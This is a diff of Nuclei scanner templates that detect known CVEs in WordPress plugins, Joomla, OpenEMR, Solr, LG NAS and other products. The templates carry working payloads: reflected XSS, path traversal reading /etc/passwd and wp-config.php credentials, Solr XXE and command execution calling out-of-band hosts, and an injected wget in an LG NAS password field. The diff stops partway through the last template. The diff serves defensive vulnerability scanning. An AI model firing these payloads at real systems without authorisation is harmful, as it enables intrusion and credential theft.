description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
|
||||
- https://www.securityfocus.com/bid/48806/info
|
||||
- https://seclists.org/bugtraq/2011/Nov/140
|
||||
tags: cve,cve2011,xss,tikiwiki
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2011-4804
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_kp - 'Controller' Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36598
|
||||
- https://www.cvedetails.com/cve/CVE-2011-4804
|
||||
tags: cve,cve2011,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-0991
|
||||
|
||||
info:
|
||||
name: OpenEMR 4.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/36650
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0991
|
||||
tags: cve,cve2012,lfi,openemr
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-4253
|
||||
|
||||
info:
|
||||
name: MySQLDumper 1.24.4 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/37129
|
||||
- https://www.cvedetails.com/cve/CVE-2012-4253
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2013-5979
|
||||
|
||||
info:
|
||||
name: Xibo 1.2.2/1.4.1 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/26955
|
||||
- https://www.cvedetails.com/cve/CVE-2013-5979
|
||||
- https://bugs.launchpad.net/xibo/+bug/1093967
|
||||
tags: cve,cve2013,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-4535
|
||||
|
||||
info:
|
||||
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'></script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-4536
|
||||
|
||||
info:
|
||||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2014-4940
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Tera Charts - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
|
||||
reference: https://www.cvedetails.com/cve/CVE-2014-4940
|
||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-5368
|
||||
|
||||
info:
|
||||
name: WordPress Plugin WP Content Source Control - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/39287
|
||||
- https://www.cvedetails.com/cve/CVE-2014-5368
|
||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-8799
|
||||
|
||||
info:
|
||||
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/35346
|
||||
- https://www.cvedetails.com/cve/CVE-2014-8799
|
||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
- "DB_USER"
|
||||
- "DB_HOST"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -15,7 +15,7 @@ info:
|
|||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
Referer: \x00
|
||||
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2015-2807
|
||||
|
||||
info:
|
||||
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2015-9414
|
||||
|
||||
info:
|
||||
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
|
||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,10 @@ info:
|
|||
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
|
||||
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
|
||||
reference: |
|
||||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
|
||||
- https://wordpress.org/plugins/anti-plagiarism
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2016-1000139
|
||||
|
||||
info:
|
||||
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
|
||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain);</script><"'
|
||||
- 'input type="text" name="ContactId"'
|
||||
condition: and
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2016-1000146
|
||||
|
||||
info:
|
||||
name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2016-1000148
|
||||
|
||||
info:
|
||||
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
|
||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script><"'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2016-1000149
|
||||
|
||||
info:
|
||||
name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2016-1000153
|
||||
|
||||
info:
|
||||
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2016-1000155
|
||||
|
||||
info:
|
||||
name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
|
||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2016-10993
|
||||
|
||||
info:
|
||||
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://www.vulnerability-lab.com/get_content.php?id=1808
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
|
||||
tags: cve,cve2016,wordpress,wp-theme,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2016-2389
|
||||
|
||||
info:
|
||||
name: SAP xMII 15.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
|
||||
reference: |
|
||||
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
|
||||
- https://www.cvedetails.com/cve/CVE-2016-2389
|
||||
tags: cve,cve2016,lfi,sap
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,26 +1,36 @@
|
|||
id: CVE-2017-12629
|
||||
|
||||
info:
|
||||
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
|
||||
name: Apache Solr <= 7.1 XML entity injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2017,solr,apache,rce,ssrf,oob
|
||||
tags: cve,cve2017,solr,apache,oob,xxe
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
||||
- https://twitter.com/honoki/status/1298636315613974532/photo/1
|
||||
- https://twitter.com/honoki/status/1298636315613974532
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
|
||||
GET /solr/admin/cores?wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
|
||||
GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "dns"
|
||||
- "http"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2017-14651
|
||||
|
||||
info:
|
||||
name: Reflected XSS - WSO2 Data Analytics Server
|
||||
author: mass0ma
|
||||
severity: medium
|
||||
description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
|
||||
tags: cve,cve2017,wso2,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=alert(document.domain)>"
|
||||
- "Failed to add new collection"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2017-18024
|
||||
|
||||
info:
|
||||
name: AvantFAX 3.3.3 XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://hackerone.com/reports/963798
|
||||
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
|
||||
description: |
|
||||
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
|
||||
tags: cve,cve2017,xss,avantfax
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin&password=admin&_submit_check=1&jlbqg<script>alert("{{randstr}}")</script>b7g0x=1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert("{{randstr}}")</script>'
|
||||
- 'AvantFAX'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -33,3 +33,8 @@ requests:
|
|||
- '"name":'
|
||||
- '"avatar_urls":'
|
||||
condition: and
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '"name":"[^"]*"'
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2017–4011
|
||||
|
||||
info:
|
||||
name: McAfee NDLP User-Agent XSS
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request.
|
||||
reference:
|
||||
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
|
||||
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
|
||||
tags: cve,cve2017,mcafee,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2018-10095
|
||||
|
||||
info:
|
||||
name: Dolibarr before 7.0.2 allows XSS.
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095
|
||||
tags: cve,cve2018,xss,dolibarr
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2018–10818
|
||||
|
||||
info:
|
||||
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
|
||||
reference: |
|
||||
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
||||
tags: cve,cve2018,lg-nas,rce,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /system/sharedir.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: curl/7.58.0
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
&uid=10; wget http://{{interactsh-url}}
|
||||
|
||||
- |
|
||||
